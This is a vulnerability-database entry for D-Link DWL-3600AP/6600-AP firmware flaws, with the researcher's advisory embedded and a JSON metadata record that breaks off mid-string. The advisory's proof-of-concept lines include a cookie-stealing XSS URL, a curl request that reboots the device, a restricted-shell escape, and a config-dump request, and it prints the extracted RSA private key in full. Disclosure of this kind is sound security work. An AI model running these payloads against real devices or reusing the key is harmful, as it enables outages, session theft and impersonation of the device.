Search criteria
7 vulnerabilities found for dwl-3600ap by dlink
VAR-201908-0911
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0911",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14333",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14333",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29140",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-146269",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14333",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-14333",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14333",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14333",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29140",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1639",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146269",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 